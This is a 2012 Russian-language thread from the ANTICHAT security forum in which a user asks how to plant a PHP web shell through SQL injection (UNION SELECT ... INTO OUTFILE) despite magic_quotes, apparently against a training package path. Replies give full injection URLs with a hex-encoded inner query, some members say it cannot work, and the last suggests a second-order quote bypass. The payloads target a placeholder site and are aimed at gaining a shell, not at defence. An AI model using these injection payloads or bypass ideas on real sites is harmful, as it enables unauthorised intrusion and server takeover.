HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.03.2012, 18:07
MrHunter
Новичок
Регистрация: 09.02.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Всем привет. Столкнулся с такой проблемой. Хочу залить шелл, но на сайте включен magic_quotes. То есть выполнить такой запрос я не могу

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707

,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/

cyphor/shell.php'

Кто знает как решить проблему?
 
Ответить с цитированием

  #2  
Старый 27.03.2012, 18:08
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

Никак.
 
Ответить с цитированием

  #3  
Старый 27.03.2012, 18:11
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию

твой запрос

Цитата:
Сообщение от None  
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
в него встраиваем внутренний запрос

Цитата:
Сообщение от None  
-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
только в хексе

Цитата:
Сообщение от None  
0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870
и должно быть что то вроде

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--

Вроде так можно
 
Ответить с цитированием

  #4  
Старый 27.03.2012, 18:25
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

Аннет, всётаки так нельзя, вложенный запрос не обработается, т.к. это не предусмотрено исполняемым скриптом, если опираться на первый пост.
 
Ответить с цитированием

  #5  
Старый 27.03.2012, 18:34
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию

Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?
 
Ответить с цитированием

  #6  
Старый 27.03.2012, 18:42
MrHunter
Новичок
Регистрация: 09.02.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
твой запрос
в него встраиваем внутренний запрос
только в хексе
и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--
Вроде так можно
OxoTnik,не выходит. Когда делаю внутренний запрос (в хекс), то он воспринимается как строка, а не как запрос. Искал возможность через сохраненные процедуры, но тоже решения пока не нашел. Есть ли другие предложения?
 
Ответить с цитированием

  #7  
Старый 28.03.2012, 21:50
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от OxoTnik  
Expl0ited
это из-за хекса нельзя, который у него в первом посте? или изза "null"?
Путь юзать в хексе нельзя.

TC, ответ дали же. НИКАК.
 
Ответить с цитированием

  #8  
Старый 13.04.2012, 11:05
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

Можно обойти, при условие, что запрос передается через переменную в другой запрос.

Точда кодируем в хекс и во втором запросе кавычки выполнятся нормально
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.